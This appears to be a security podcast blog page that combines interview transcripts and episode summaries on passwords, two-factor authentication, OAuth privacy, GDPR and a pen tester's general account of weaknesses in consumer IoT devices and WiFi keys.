The cloud services and the password managers that are used in cloud services, they are also encrypting all your data locally. Then the encrypted data are being transferred to the cloud service. So if the cloud service and the password manager service is being compromised, the attackers will only get access to encrypted data, and they don't have access to the keys stored on your computer or on your phone to be able to unlock those data. So those are actually very safe to use.
Cindy Ng: It sounds like hidden message too is doing a risk analysis on yourself. Guide us…
Per Thorsheim: Yeah.
Cindy Ng: What is your recommendations for that?
Per Thorsheim: The risk analysis is from an incredibly simple perspective, I'm asking people to write down all this stuff. Who do you think your enemies are? And in most cases the national security agency of the U.S. or the FSB and D of Russia, they're not your enemies. They have no interest in your life or your data whatsoever. If you're just a normal citizen, just like most of us are. If you're a five-star general in the army, or if you're working in intelligence service of some country asking something, Then obviously other nation states have an interest in getting access to your data and whatever you do and find out, and then the risk perspective is very different. But in most cases, the biggest risk for you as a normal citizen in most countries will be yourself losing your passwords or random computer viruses that are not targeted on you, will get access to your Facebook account or your bank account and steal your money.
So the risk analysis is simple. Do the list of who are your enemies and also try to look at for each of these different enemies that you might have, what are the possibility of them actually being able to get access to your data, your usernames, and passwords? If you have them on paper at home, they would have to come to wherever you live and break into your house. The probability of that happening is close to none. Nobody would be interested in going to Norway and break into my apartment, as an example.
Cindy Ng: Who or what would be the enemy of an organization of businesses?
Per Thorsheim: First of all I would say competitors of course. Competitors could be interested in trying to gain access to sensitive information that you have about new and upcoming products being researched and developed currently in your company. You also have to think about the opportunistic hacker, that just wants to make money in some way or another. It could be by giving you a crypt log or a virus that will encrypt the data files that you have on your computer. They don't care about what kind of data gets encrypted and then the bad guys will say, "Hey. This is ransomware," as we call it. "So you have to pay us a certain amount of money for us to give you the password needed to be able to decrypt your files again."
That's a very realistic threat to organizations and companies today, that you need to look into as well. So competitors and random bad guys, just trying to make some quick money. Those are I would say the most important threats to an organization today.
Cindy Ng: Thank you so much, Per.
Last month, there was a thought-provoking article on programmers who were asked to do unethical work on the job. We often talk about balancing security with precaution and paranoia, but I wondered about the balance of ethics and execution.
As always, I was curious to hear the reactions from the Inside Out Security Show panel – Mike Buckbee, Kris Keyser, and Mike Thompson.
Here’s what they had to say:
Thompson: “The downside in technology is that shortcuts lead to lapses in security…In healthcare, there are tight regulations…but who is making that decision in the technology industry?”
Buckbee, “We talk about different kinds of crime like property, violent crime, and white collar crime. There’s cybercrime as well. People have different acceptable models in these different areas. [For instance] when it comes to SQL injection, you probably don’t think that adding a few additional characters to a URL is a felon criminal trespass, but it totally could be…”
Keyser, “I drew a parallel between engineers that work in the physical space and engineers that work in the digital space. And engineer or somebody who builds a faulty house with a poor structure or horrible locking system, there would be repercussions for that if the house collapsed…I don’t think people have realized the parallels between that and the digital space.”
Click play to see what else they had to say! Additional responses include: thoughtful insights to the most recent San Francisco MUNI hacker that got hacked, potentially unnecessary malware fixes, as well as the latest hacking tools and exploits.
Based in Norway, Per Thorsheim is an independent security adviser for organizations and government. He is also the founder of PasswordsCon.org, a conference that’s all about passwords, PIN codes, and authentication. Launched in 2010, the conference is a gathering security professionals & academic researchers worldwide to better understand and improve security worldwide.
In part one of our conversation, Per explains - despite the risks - why we continue to use passwords, the difference between 2-factor authentication and 2-step verification, as well as the pros and cons of using OAuth.
Naturally the issue of privacy comes up when we discuss connected accounts with OAuth. So we also made time to cover Privacy by Design as well as the upcoming EU General Data Protection Regulation(GDPR).
Cindy Ng
Recently, I had the pleasure to speak with an independent security advisor, Per Thorsheim, on all things passwords.
Based in Norway, he is the founder of Passwords Con, the world's first and only conference about passwords. It's a gathering of security professionals and academic researches from all around the world where they discuss ways to improve security worldwide. Thank you, Per. Let's get started.
So, a very important question, so, lots of security experts have warned us the dangers of passwords, but why are we continuing to use it?
Per Thorsheim
Well, it's cheap to use from a business perspective. There are many cases where we don't have a business situation where, you know, there's no point in using anything else than passwords. They are available in every single system we use, and if you want something else, it's going to be more expensive. And who's going to pay for that?
Cindy Ng
A lot of people are using password managers to manage all our different accounts for all our different sites. And there’s also two-factor authentication which can be tiresome. You suggested that there's life after two-factor authentication. Can you tell us a little bit more about that?
Per Thorsheim
Yeah, you know, we have National Security Awareness month here in Norway, just like in the US, in all of October. And a very important message that we have been bringing out in all possible channels over the past month is to use two-factor authentication. And basically what that is, is that in addition to having a username and password, you would have a code that you need to enter that you will get from a key from a text message or something similar. Maybe you have a couple of codes written down on a piece of paper that you have to type in, in addition to your password. That's two-factor authentication.
Now, what I mean about life after two-factor authentication is that every step that we add into the process of authenticating, you know, how to figure out that you are the correct person logging into our system, takes time. And by adding a second factor, it will take you, in most cases, a little bit extra time to be able to log in. For some people, that's okay. For some people, it's a disruption. It's annoying, and what I've been thinking about, you know, by saying, "life after two-factor authentication," is, "What happens today when, in my case, I have, like, 400 accounts on different services all over the internet and at home and at different, you know, banks and insurance companies and so on? What happens today that I'm actually using two-factor authentication with all of those accounts?"
I'm just imagining to myself that that's going to be very annoying. It's going to take a lot of time. Every time I have to log in to any kind of service, I have to type in username, I have to type in my password or pass phrase, and then I also have to look at my phone to receive a text message or find you know, that dumb piece of hardware dongle that I forgot at home, probably, and type in a code from that one as well. So from a usability perspective, I'm a little bit concerned, maybe even a little worried about what's the world going to be in a couple years when all the services that I'm using today are either offering or even requiring me to use two-factor authentication?
Now, from a security perspective, adding this kind of two-factor authentication's a good thing. It increases security in such a way that in some cases, even if I told you my password for my Facebook account, as an example, well, I have two-factor authentication. You won't be able to log in, because as soon as you type in my username and password, I will be receiving a code via SMS from Facebook on my phone, which you don't have access to. Now, without that code, you will not be able to log in to my account. The security perspective of this is really good which is why we recommend it. From the usability side, I'm a little bit concerned about the future.
Cindy Ng
What's the difference between the two-factor authentication and the two-step authentication, in terms of increasing usability?
Per Thorsheim
Two-step verification process is what I consider to be a good trade-off between good security and good usability. With two-step verification, which is what Facebook and Twitter and Google does in most cases, is that you will do the initial setup process of your account and an initial setup of your two-factor authentication procedure, like, once, to log in, using the Facebook app on your phone, on your iPad. Maybe you're using the browser on your computer. And you do this authentication with username, password, and entering the additional code once per device or per app that you're using or maybe for each and every single web browser on different computers that you may be using.
And as soon as you've done that, Facebook will remember the different browsers and apps you have used, and then, you know, they are already pre-approved. So then next time you log in, you only type in your username and password, which reduces complexity and time for you. But still they remember your browser, so they see that, "Oh, yep, that's Per logging in from a browser that he had already used before, so we know that this browser probably belongs to Per. And as long as the username and password is correct, he gets access to his Facebook account." The two-factor authentication process, I would have to enter that additional code every single time I log on, and that's the difference between the two-step verification and the two-factor authentication.
Cindy Ng
What if I decide to delete my cookies?
Per Thorsheim
Well, then it's all gone. Then you have to do the setup process again, and this applicable to when you're using your web browser. But if you are using the official Facebook app for iOS or for Android, as an example, these features are built into the application. In that setting, it's not just a standard cookie. There's a little bit different security built into the app. But, of course, you can do this on the app as well to basically delete your cookie.
Cindy Ng
You would essentially have to do a risk analysis on yourself to figure out what the trade-off is in that regard.
Per Thorsheim
Yeah, absolutely. You know, when I go traveling abroad, I go to many different countries, and some of them may be, well, should I say, a little less democratic and a little more hostile, perhaps, than others. So I do my personal risk analysis on wherever I go, do I need a strong PIN code? Do I need a strong password? Should I be using two-factor authentication? And this is a risk analysis, and it's also trade-off for the usability. I'm just like, I guess, everybody. I want security to be good, but I'm not willing to sacrifice too much of the usability in order to keep up good security, because then I will probably stop using the service if I'm forced to be compliant with all kinds of security requirements all the time, when there's, you know, from my perspective, no point in doing so.
Cindy Ng
Let's also talk about other security options, such as O-auth. Tell us a little bit more about the pros and cons of using that as an option to log in.
Per Thorsheim
Well, it solves many problems, especially in terms of usability. I can go to an online store here in Norway, and I'll want to purchase myself a new computer, or maybe I would like to order tickets to the movie theater to go with somebody to watch a movie, as an example. And instead of having to sign up for an account, I can use what we call a social login, where they are using O-auth in the background, and you basically sign up using your Facebook account. Now, this is, from a usability perspective, it's very easy to do.
The privacy concerns about this is the fact that Facebook will be getting access to information like you went to the movie theater, and they will maybe be able to find out which movie you actually went to see and how many tickets you've purchased. I don't know. Maybe they can. And the movie theater, they will also get information from Facebook about me, who I am, my age, my gender, maybe some other pieces of information as well. And in my opinion, the movie theater shouldn't be asking me, you know, who I am or anything. You know, I want to see a movie. I'm not going to make any trouble for them, and I'm going to pay for the tickets, and that's it. There are lots of privacy concerns about this, at least from my perspective. And I am a little bit concerned that most people, they don't really realize how much information they actually give away about themselves when they are using this kind of authentication to all kinds of services around.
Cindy Ng
You're really speaking to data minimalization, which is part of the "Privacy by Design" guideposts, to collect what you really need, not collect every single thing. When you go see the movies, they don't need to know every single friend that you have on Facebook, for instance.
Per Thorsheim
Yeah, and, of course, from science modeling perspectives, I can see that they actually have an interest in knowing this about you. But, you know, the movie theater, they don't give me a discount when I provide lots of personal information about myself, compared to those who just purchase a ticket and pay in cash. And they remain completely anonymous, so to speak, for the movie theater, while I'm paying the same price, but at the same time I also give them information about my age, address and phone number, email address, gender, a lot of pieces of information as well. In one way, I would say that, well, if they would give me a discount, maybe I would be interested in giving away more personal information about myself.
It's going to be interesting when the GDPR actually comes into law. I still do have my concerns about GDPR. I mean, it's a EU law, so that will be implemented in different countries in the EU and also in Norway. I mean, we are actually not actually a member of the European Union, but still the GDPR will be put into our laws and regulations as well. And the most important aspect of GDPR, in my opinion, is that if you are a service provider of any type, and you suffer a data breach of personally identifiable information about, you know, users, especially if that information is sensitive - that is, regarding sexuality, health, criminal records, political activity, religious activity, membership in worker unions, as an example - the GDPR says that the company or organization in question can get a fine up to 4% of their total global yearly revenue.
And, you know, you look at the numbers of Apple and Microsoft and Google, of how much revenue they make in a full year, and then, you know, 4% of that amount is going to be the maximum fine for one single data breach. That's a lot of money. Today, data breach laws here in Norway, as an example, will give you a fine so small that anybody can pay it without any problems at all. So this is a game-changing regulation that is coming into law for the European Union. How it will be interpreted in courts, and how big those fines will actually be, that is going to be very interesting to see from starting in somewhere in 2018.
Cindy Ng
Yeah, it'll be a challenge to see how they can enforce it when US companies do business in Norway or any of the EU countries.
Per Thorsheim
Well, absolutely. I mean, there have been attempts to set up agreements between European Union and the US, as an example, for Cloud services from Google, from Apple, from Microsoft and so on that will regulate how US companies are to handle data about European citizens and also whether the US government can get access to that data or not. And these are, as far as I know, still ongoing discussions, of course, but there are also laws and regulations and agreements already in place on this. That applies, again, to how US companies are handling data about European citizens stored on computers in Europe.
Cindy Ng
Let's talk about hardware. What do you think about things like the YubiKey and the RSA Tokens. How effective is having hardware in...
Per Thorsheim
Well, from the risk analysis perspective, it's a good thing. If I give you an app that you will use on your phone that will provide you with codes that you need to log in, somebody would either have to steal your phone. They could eventually trick you, talk you into giving them the code from your app by, you know, calling you and say, "Hey, this is from Microsoft Support in India, and we are calling to make you aware that you have some problems with your account. We need to verify your account by having you read up the present token number that you have on your phone at the moment."
But, in general, from a risk analysis perspective, having a hardware token is good thing, security-wise. And it's much better than using just an app or receiving a text message by SMS, because an app is a piece of software that may have vulnerabilities, and SMS messages are also being sent, essentially, in the glare. And we know from assessing vulnerabilities in the worldwide user networks that they can be interrupted, and they can also be sent through hostile servers, where an adversary can read them in plain text and then get access to your account. If you have a handheld device, maybe with a, you know, small screen and doesn't have any connectivity at all, it just generates a new code every 30 seconds or 1 minute or 5 minutes, like RSA Secure ID. It's much harder for an attacker to get access to those codes. They would either have to trick you, or they would have to steal comments in that physical token from you.
Cindy Ng
It's interesting how social engineering can happen with hardware that's supposed to protect us too.
Like many in IT, you can probably commiserate with this week’s Inside Out Security Show panel – Cindy Ng, Mike Buckbee and Alan Cizenski – on elaborating when someone asks you, “What Do You Do for a Living?” Whether you’re a programmer or a sysadmin, the scope of your role is often multi-faceted and complex.
In this episode, we talk about various roles and responsibilities of those in IT - differentiating similar tools, testing and evaluating, balancing practical decision making, and much more.
On election day, I stumbled upon an article that described presidential candidates’ newfound ability to influence voters with big data. Not health, financial or sensitive data, but data from loyalty cards, gym memberships etc.
Rather than a financial exchange as the end goal, the purpose of using big data to influence end users would be for a vote on November 4th.
What a fascinating use of data!
I had to get responses from the Inside Out Security Show panel – Cindy Ng, Kilian Englert, Mike Buckbee, and Forrest Temple. They engaged in a lively discussion on the pros and cons of leveraging big data in a presidential election, the significance of data integrity, as well as the controversies on the ability to re-identify anonymized data.
Lastly, in our “Tool for Sysadmins” segment, Buckbee shares PowerForensics. By the way, we also discuss when it’s worthwhile to script and when it’s worth forking over a check to get security done right.
In the next part of our discussion, data privacy attorney Sheila FitzPatrick get into the weeds and talks to us about her work in setting up Binding Corporate Rules (BCR) for multinational companies. These are actually the toughest rules of the road for data privacy and security.
What are BCRs?
They allow companies to internally transfer EU personal data to any of their locations in the world. The BCR agreement has to get approval from a lead national data protection authority (DPA) in the EU. FitzPatrick calls them a gold standard in compliance—they’re tough, comprehensive rules with a clear complaint process for data subjects.
Another wonky area of EU compliance law she has worked on is agreements for external transfer data between companies and third-party data processors. Note: it gets even trickier when dealing with cloud providers.
This is a fascinating discussion from a working data privacy lawyer.
And it’s great background for IT managers who need to keep up with the lawyerly jargon while working with privacy and legal officers in their company!
Earlier this month at the awesome O’Reilly Security Conference, I learned from world-leading security pros about the most serious threats facing IT. Hmm, sounds like that would make a great topic to discuss with the Inside Out Security Show panel – Cindy Ng, Kilian Englert, Kris Keyser, and Peter TerSteeg.
Let’s go meta. According to expert Becky Bace, you can generalize security challenges as a cycle of new attacks and vulnerabilities, requiring damage control and remedies, and then followed by newer and smarter attacks.
It’s always kind of the same problem, but dressed up a little differently each time.
Moreover, in the latest 2016 Deloitte-National Association of State Chief Information Officers (NASCIO) Cybersecurity Study, 80% of the respondents say inadequate funding is one of the top barriers to effectively addressing cybersecurity threats.
That led me to wonder, how can we get more funding and stretch existing dollars for the Infosec department?
Our panelists discussed ways in which we can help businesses make and save money, the costs of a breach, and whether or not organizations should get cyberinsurance.
And towards the end of the show, we played make-believe IT deparment and pretended we got extra budget for our team.
Finally, we enjoyed a lighthearted IT moment as we discussed this tell-all article, 25 Infosec Gurus Admit to their Mistakes…and What They Learned from Them.
In this episode of the Inside Out Security Show panel – Cindy Ng, Mike Buckbee and Mike Thompson – shared their thoughts on the latest botnet attack.
“This botnet attack that happened recently that brought down the DNS services. That’s probably unfortunately the first of many,” warns Mike Thompson. His concerns also launched the group into discussing the challenges of balancing innovation alongside security and privacy.
We ended the show with a few tools Buckbee recommended, “The big DDoS attack that happened, it was really targeted at a company called Dyn…It was the DNS that indicated where the traffic should go that was messed up, at the DNS provider level…A lot of times, it happens at a local level…it’s really easy to mess up your own DNS. A very useful tool: What’s my DNS”
Listen in if you wanna know the very first security precaution Thompson takes when he gets a new router. You'll also learn who out of the group has embraced IoT devices with open arms.
Since October was Cyber Security Awareness month, we decided to look at what’s holding back our efforts to make security—to coin a phrase—“great again”.
In this episode of the Inside Out Security Show panel – Cindy Ng, Kilian Englert, Kris Keyser, and Mike Buckbee – shared their thoughts on insider threats as discussed on a recent Charlie Rose show, the brilliant but evil use of steganography (the practice of concealing a file, message, image, or video within another file, message, image, or video), and the dark market for malware hidden in underground forums.
For a taste of the podcast, here are a few data security ideas and quotes from our panelists.
Insider Threat. According to Keyser, an insider attack might not necessarily be the fault of employees. It could be that a hacker obtained their credentials—by guessing or pass-the-hash-- and the attack was executed under their name. So don’t make an employee the ‘fall guy’ for what was really an outsider. Blame IT instead. Kidding!
Steganography. On hackers hiding credit card information on images, Keyser says, “It’s reminiscent of the skimmer attack, you might find on an ATM or a card reader at shop you go to, but it’s applying that same concept to data, the nonphysical world.”
Like the rest of us, Englert was fascinated by the use of steganography. Englert says, “It’s always been kind of an interesting concept that I played with just for fun, but to see this used as an exfilitration method, it’s terrifying and it’s also brilliant. Having the website serve up the information you’re stealing, publicly, hidden in image files, it’s such a great way to get data out.”
What will hackers think up next?
Underground Forums. Englert thinks these underground sites are fulfilling a market need. He says, “Why not be enterprising? Makes sense from a business perspective. It’s not moral, but a way to make money.” Hackers are certainly displaying an entrepreneurial spirit.
Thinking Like a Hacker
With DDos attacks on the rise – up 125% in 2016-- Buckbee shares what he learned from Marek Majkowski’s presentation, “Are DDoS attacks a threat to the decentralized internet?” A united Internet makes us strong, and with a divided one we may fall.
A Tool for Sysadmins
Mosh (mobile shell) is a remote terminal application that supports intermittent connectivity, allows roaming, and speculatively and safely echoes user keystrokes for better interactive response over high-latency paths.
We have more Ken Munro in this second part of our podcast. In this segment, Ken tells us how he probes wireless networks for weaknesses and some of the tools he uses.
One takeaway for me is that the PSKs or passwords for WiFi networks should be quite complex, probably at least 12 characters. The hackers can crack hashes of low-entropy WiFi keys, which they can scoop up with wireless scanners.
Ken also some thoughts on why consumer IoT devices will continue to be hackable. Keep in mind that his comments on security and better authentication carry over quite nicely to the enterprise world.
Could you talk more your work with these gadgets?
Ken: Yeah, so where they're interesting to us is that in the past to get hold of decent research equipment to investigate, it used to be very expensive. But now that the Internet of Things has emerged. We're starting to see low-cost consumer goods with low-cost chip sets, with low-cost hardware, and low-cost software starting to emerge at a price point that the average Joe can go and buy and put into their house.
A large company, if they buy technologies, has probably got the resources to think about assessing their security … And put some basic security measures around. But average Joe hasn't.
So what we wanted to do was try and look to see how good the security of these devices was, and almost without exception, the devices we've been looking at have all had significant security flaws!
The other side of it as well, actually, it kind of worries me. Why would one need a wireless tea kettle?
IOS: Right. I was going to ask you that. I was afraid to. Why do you think people are buying these things? The advantage is that you can, I guess, get your coffee while you're in the car and it'll be there when you get home?
Ken: No. It doesn't work like that …Yeah, that's the crazy bit. In the case of the WiFi kettle, it only works over WiFi. So you've got to be in your house!
IOS: Okay. It's even stranger.
Ken: Yeah, I don't know about you but my kitchen isn't very far away from the rest of my house. I'll just walk there, thanks.
IOS: Yeah. It seems that they were just so lacking in some basic security measures … they left some really key information unencrypted. What was the assumption? That it would be just used in your house and that it would be just impossible to someone to hack into it?
Ken: You're making a big step there, which is assuming that the manufacturer gave any thought to an attack from a hacker at all. I think that's one of the biggest issues right now is there are a lot of manufacturers here and they're rushing new product to market, which is great. I love the innovation.
I'm a geek. I like new tech. I like seeing the boundaries being pushed. But those companies that are rushing technologies to market with not really understanding the security risk. Otherwise, you're completely exposing people's homes, people's online lives by getting it wrong.
IOS: Right. I guess I was a little surprised. You mentioned in your blog something called wigle.net?
Ken: Yeah, wigle is …. awesome and that's why WiFi's such a dangerous place to go.
IOS: Right.
Ken: Well, there's other challenges. It's just the model of WiFi -- which is great, don't get me wrong -- when you go home with your cell phone, your phone connects to your WiFi network automatically, right?
Now, the reason I can do that is by sending what are called client probe requests. And that's your phone going, "Hey, WiFi router, are you there? Are you there? Are you there?"
Of course, when you're out and about and your WiFi's on, it doesn't see your home WiFi router. But when you get home, it goes, "Are you there?" "Yeah, I'm here," and it does the encryption and all your traffic's nice and safe.
What wigle does — I think it stands for wireless integrated geographic location engine, which is crazy … security researchers have been out with wireless sniffers, scanners, and mapped all the GPS coordinates of all the wireless devices they see.
And then they collate that onto wigle.net, which is a database of these which you can basically query a wireless network name … and work out where they are.
So it's really easy. You can track people using the WiFi on their phones using wigle.net. You can find WiFi devices. A great example of that was how we find the iKettle, that you can search wigle.net for kettles. It's crazy!
IOS: Yeah, I know. I was stunned. I had not seen this before. I suspect some of the manufacturers would be surprised if they saw this. We see the same thing in the enterprise space or IT. I'm just sort of surprised that's just so many tools and hacking tools out there.
But in any case, I think you mentioned that some of these devices start up as an access point and that, in that case, you know the default access name of the iKettle or whatever the device is, and then you could spot it.
Is this the way the hackers work?
Ken: No, that's right. The issue with an IoT WiFi device is that when you first put it up, you need to get through a process of connecting to it and connecting it to your home WiFi network.
And that is usually a two-stage process. Usually. It depends. Some devices don't do this but most devices, say, the iKettle, will set itself up as an access point first or a client-to-client device, and then once you go in and configure it with your cell phone, it then switches into becoming a client on your WiFi network. And it's going through that set of processes where we also found issues and that's where you can have some real fun.
IOS: Right. I think you took the firmware of one of these devices and then was able to figure out, let's say, like a default password.
Ken: Yeah. That's another way. It's a completely different attack. So that's not what we'll do in the iKettle. We didn't need to go near the firmware.
But a real game changer with IoT devices is that the manufacturer is putting their hardware in the hands of their customers … Let's say you're a big online retailer. Usually you bring them in with application and you buy stuff.
With the Internet of Things, you're actually putting your technology -- your kit, your hardware, your firmware, your software — into the hands of your consumers.
If you know what you're doing, there's great things you can do to analyze the firmware. You can extract off from devices, and going through that process, you can see lots of useful data. It's a real game changer, unlike a web application where you can protect it with a firewall … But the Internet of Things, you put your chips into the hands of your customers and they can do stuff with that potentially, if they have got security right.
IOS: Right. Did you talk about they should have encrypted the firmware or protected it in some way? Is that right?
Ken: Yeah. Again, that's good practice. In security, we talk about having layers of defense, what we call defense in depth so that if any one layer of the security chain is broken, it doesn't compromise the whole device.
And a great example for getting that right would be to make sure you protect the firmware. So you can digitally sign the code so that only valid code can be loaded onto your device. That's a very common problem in design where manufacturers haven't looked at code signing and therefore we can upload rogue code.
A good example of that was the Ring doorbell. Something that's attached to the outside of your house. You can unscrew it. You can walk off with it. And we found one bug whereby you can easily extract the WiFi key from the doorbell!
Again, the manufacturer fixed that really quickly, which is great, exactly what we want to see, but our next step is looking at it and seeing if we can take the doorbell, upload a rogue code to it, and then put it back on your door.
So we've actually got a back door on your network.
IOS: Right, I know. Very scary. Looking through your blog posts and there were a lot of consumer devices, but then there was one that was in a, I think, more of a borderline area and it was ironically a camera. It could potentially be a security camera. Was that the one where you got the firmware?
Ken: Yeah, that was an interesting one. We've been looking at some consumer grade CCTV cameras, although we see these in businesses as well. And we've particularly been looking at the cameras themselves and also the digital video recorders, the DVRs where they record their content onto.
So many times we find someone has accidentally put a CCTV camera on the public Internet. You've got a spy cam into somebody's organization! The DVR that records all the content, sometimes they put those on the Internet by mistake as well. Or you find the manufacturers built it so badly that .. it goes on by itself, which is just crazy.
IOS: Yeah, there's some stunning implications, just having an outsider look into your security camera. But you showed you were able to, from looking at the...it was either the firmware or once you got into the device, you could then get into network. Was that right?
Ken: Yeah, that's quite ironic really, isn't it? CCTV cams, you consider to be a security device. And what we found is not just the camera but also the DVR, if you put it on your network and ,,, it can create a backdoor onto your network as well. So you put on a security device that makes you less secure.
IOS: One of things you do in your assessments is wireless scanning and you use something, if I'm not mistaken, called Kismet?
Ken: Kismet's a bit old now ... There are lots of tools around but the Aircrack suites is probably where it's at right now And that's a really good suite for wireless scanning and wireless g cracking.
IOS: Right. So I was wondering if you could just describe how you do a risk assessment. What would be the procedure using that particular tool?
Ken: Sure. At its most basic, what you'd be looking to do, let's say you're looking at your home WiFi network. Basically, we need to make sure your WiFi is nice and safe. And security of a WiFi key is how long and complex it is.
It's very easy to grab an encrypted hash of your WiFi key by sitting outside with a WiFi antenna and a tool like Aircrack, which allows you to grab the key. What we then want to do is try and crack that offline. So once I've got your WiFi key, I'm on your network, and we find in a lot of cases that ISP WiFi routers, the default passwords just aren't complicated enough.
And we looked at some of the ISPs in the U.K. and discovered that some of the preset keys, we could crack them on relatively straight-forward equipment in as little as a couple of days.
IOS: Okay. That is kind of mind-blowing because I was under the impression that those keys were encrypted in a way that would make it really difficult to crack.
Ken: Yeah, you hope so but, again, it comes down to the length and complexity of the key. If you WiFi network key is only say -- I don't know — eight characters long and it's not really going to stand up to a concerted attack for very long. So again, length and complexity is really important.
IOS: Yeah, actually we do see the same thing in the enterprise world and one of the first recommendations security pros make is the keys have to be longer and the passwords have to be longer than at least 8.
Ken: We've been looking at some ... there's also the character set as well. We often find … the WiFi router often might only have lower case characters and maybe some numbers, and those numbers and characters are always in the same place in the key. And if you know where they are and you know they're always going to be lower case, you've reduced the complexity.
IOS: Right.
Ken: So I'd really like to be seeing 12-, 15-, 20-character passwords.
It's not a difficult thing. Every time you get a new smartphone or a new tablet, you have to go and get it from the router then but really I think people can cope with longer passwords that they don't use very often, don't you think?
IOS: No, I absolutely agree. We sort of recommend, and we've written about this, that you can...as an easy way to remember longer passwords, you can make up a mnemonic where each letter becomes part of a story. I don't know if you've heard of that technique.
You can get a 10-character password that's easy to remember and therefore becomes a lot harder to decrypt. We've also written a little bit about some of the decrypting tool that are just easily available, and I think you mentioned one of them.
Was it John the Ripper?
Ken: John is a password brute force tool and that's really useful. That's great for certain types of passwords. There are other tools for doing different types of password hashes but John is great. Yeah, it's been around for years.
IOS: It's still free.
Ken: But there are lots of other different types of tools that crack different types of password.
IOS: Okay. Do you get the sense that, just going back to some of these vendors who are making these devices, I think you said that they just probably are not even thinking about it and perhaps just not even aware of what's out there?
Ken: Yeah, let's think about it. The majority of start-up entrepreneur organizations that are trying to bring a new IoT device to market, they've probably got some funding. And if they're building something, it's probably going to be going into production nine months ahead.
Imagine you've got some funding from some investors, and just as you're about to start shipping, somebody finds a security bug in your product!
What do you do? Do you stop shipping and your company goes bust? Or do you carry on and trying to deal with the fallout?
I do sympathize with these organization, particularly if they had no one giving them any advice along the way to say, "Look, have you thought about security?" Because then they're backed into a corner. They've got no choice but to ship or their business goes bankrupt, and they've got no ability to fix the problem.
And that’s probably what happened with the guys who made the WiFi kettle. Some clever guys had a good idea, got themselves into a position where they were committed, and then someone finds a bug and there's no way of backing out of shipping.
IOS: Right, yeah. Absolutely all true. Although we like to preach something called Privacy by Design — at least it’s getting a lot more press than it did a couple years ago — which is just the people at the C-level suite should just be aware that you have to start building some of these privacy and security ideas into the software.
Although it's high-sounding language. And you're right, when it comes to it, a lot of companies, especially start-ups, are really going to be forced to push these products out and then send out an update later, I guess is the idea. Or not. I don't know.
Ken: That's the chance, isn't it?
So if you look at someone like Tesla, they've had some security bugs found last year and they have the ability to do over-the-Internet updates. So the cars can connect over WiFi and all their security bugs were fixed over the air in a two-week period!
I thought that was fantastic.
So they can update in the field ... if you figured out that, brilliant. But they don't have the ability to do updates once they're in the field. So then you end up in a real stick because you've got products you can only fix by recalling, which is a huge cost and terrible PR. So hats off to Tesla for doing it right.
And the same goes for the Ring doorbell. The guys thought about it. They had a process whereby it got the updates really, really easy, it's easy to fix, and they updated the bug that we found within about two weeks.
And that's the way it should be. They completely thought about security. They knew they couldn't be perfect from the beginning. "Let's put a cable in place, a mechanism, so we can fix anything that gets found in the field."
IOS: Yes. We're sort of on the same page. Varonis just sees the world where there will always be a way for someone to get into especially newer products and you have to have secondary defenses. And you've talked about some good remediations with longer passwords, and another one we like is two-factor authentication.
Any thoughts on biometric authentication?
Ken: Yes. Given the majority of IoT devices have being controlled by a smartphone, I think it's really key for organizations to think about how they've authenticated the customer to a smart device or, if they have a web app, the web interface as well, how they authenticate the customer to that.
I'm a big fan of two-factor authentication. People get their passwords stolen in breaches all the time. And because they will reuse their passwords across multiple different systems, passwords stolen from one place and you find another place gets compromised.
There was a great example, I think, some of the big data breaches ... they got a password stolen in one breach and then someone got their account hacked. It wasn't hacked. They just had reused the password!
IOS: Right.
Ken: So I'm a real fan of two-factor authentication to prevent that happening. Whether it's a one-time SMS to your phone or a different way of doing it, I think two-factor authentication is fantastic for helping Average Joe deal with security more easily. No one's going to have an issue with, "Look, you've sent me an SMS to my phone".
That's another layer of authentication. Great. Fantastic." I'm not so much a fan of biometrics by themselves and the reason for that is my concern about revocation. Just in case the biometric data is actually breached, companies get breached all the time, we've not just lost passwords because passwords we throw them away, we get new ones, but if we lose your biometic, we're in a bit more of a difficult position.
But I do biometrics work brilliantly when they're combined with things like passwords. Biometric plus password is fantastic as a secure authentication.
IOS: Thanks for listening to the podcast. If you're interested in following Ken on Twitter, his handle is TheKenMunroShow or you can follow his blog at PenTestPartners.com. Thanks again.
Our inspiration for this week's show was Michelle Obama's popular catchphrase, "When they go low, you go high." Don't worry, our next episode will also have a fun Republican catchphrase.
In this episode, we discussed how low the security of our favorite things have gone - in music, email, and the internet of things(IoT).
Music. There are a lot of music lovers that use Spotify on their desktops, but they weren't expecting it to periodically cause their browser to open malicious sites without their permission.
Email. These days, even though kids these days think email is passé, organizations still rely on email. That's why, we must cover Yahoo's 500 million leaked accounts as well as hacked presidential candidates emails. (Psst, go to 5:03, if you wanna know how much Yahoo would have paid if GDPR - the EU's latest data protection regulation - was in effect)
IoT. Lastly, we discussed Mirai, the recent DDoS attack against Brian Krebs, who runs KrebsOnSecurity.com, a publication about cybersecurity.
Thinking Like a Hacker
In this segment, we attempt to explain "SQL Injection" to a 5-year-old.
A Tool for Sysadmins
Fiddler - The free web debugging proxy for any browser, system or platform
Subscribe & Follow
If you want to understand the ways of a pen tester, Ken Munro is a good person to listen to. An info security veteran for over 15 years and founder of UK-based Pen Test Partners, his work in hacking into consumer devices — particularly coffee makers — has earned lots of respect from vendors. He’s also been featured on the BBC News.
You quickly learn from Ken that pen testers, besides having amazing technical skills, are at heart excellent researchers.
They thoroughly read the device documentation and examine firmware and coding like a good QA tester. You begin to wonder why tech companies, particularly the ones making IoT gadgets, don’t run their devices past him first!
There is a reason.
According to Ken, when you’re small company under pressure to get product out, especially IoT things, you end up sacrificing security. It’s just the current economics of startups. This approach may not have been a problem in the past, but in the age of hacker ecosystems, and public tools such as wigle.net, you’re asking for trouble.
The audio suffered a little from the delay in our UK-NYC connection, and let’s just say my Skype conferencing skills need work.
Anyway, we join Ken as he discusses how he found major security holes in wireless doorbells and coffee makers that allowed him to get the PSK (pre-shared keys) of the WiFi network that’s connected to them.
Could you talk more your work with these gadgets?
Ken: Yeah, so where they're interesting to us is that in the past to get hold of decent research equipment to investigate, it used to be very expensive. But now that the Internet of Things has emerged. We're starting to see low-cost consumer goods with low-cost chip sets, with low-cost hardware, and low-cost software starting to emerge at a price point that the average Joe can go and buy and put into their house.
A large company, if they buy technologies, has probably got the resources to think about assessing their security … And put some basic security measures around. But average Joe hasn't.
So what we wanted to do was try and look to see how good the security of these devices was, and almost without exception, the devices we've been looking at have all had significant security flaws!
The other side of it as well, actually, it kind of worries me. Why would one need a wireless tea kettle?
IOS: Right. I was going to ask you that. I was afraid to. Why do you think people are buying these things? The advantage is that you can, I guess, get your coffee while you're in the car and it'll be there when you get home?
